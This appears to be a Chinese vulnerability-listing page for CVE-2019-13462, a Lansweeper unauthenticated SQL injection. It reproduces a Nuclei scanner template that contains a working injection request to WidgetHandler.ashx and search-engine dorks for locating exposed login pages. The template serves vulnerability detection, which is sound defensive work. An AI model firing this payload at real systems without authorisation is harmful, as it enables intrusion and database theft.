CVE-2019-13462: Lansweeper Unauthenticated SQL Injection

日期: 2025-08-01 | 影响软件: Lansweeper | POC: 已公开

漏洞描述

Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.

PoC代码[已公开]

id: CVE-2019-13462

info:
  name: Lansweeper Unauthenticated SQL Injection
  author: divya_mudgal
  severity: critical
  description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Lansweeper system.
  remediation: |
    Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability.
  reference:
    - https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13462
    - https://www.nccgroup.trust/uk/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
    - https://www.lansweeper.com/forum/yaf_topics33_Announcements.aspx
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-13462
    cwe-id: CWE-89
    epss-score: 0.60423
    epss-percentile: 0.98234
    cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lansweeper
    product: lansweeper
    shodan-query: http.title:"lansweeper - login"
    fofa-query: title="lansweeper - login"
    google-query: intitle:"lansweeper - login"
  tags: cve,cve2019,sqli,lansweeper

http:
  - method: GET
    path:
      - '{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "~lansweeperdb~"

      - type: word
        part: header
        words:
          - text/plain

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210085cc9f00d9498faffc267a92ce9398a30b93c58ffc96e5b020c73ef88c018ced02204d8ec8c0685104d11046228aea1612c3647cba61782ece4c677743bf2562f369:922c64590222798bb761d5b6d8e72950

相关漏洞推荐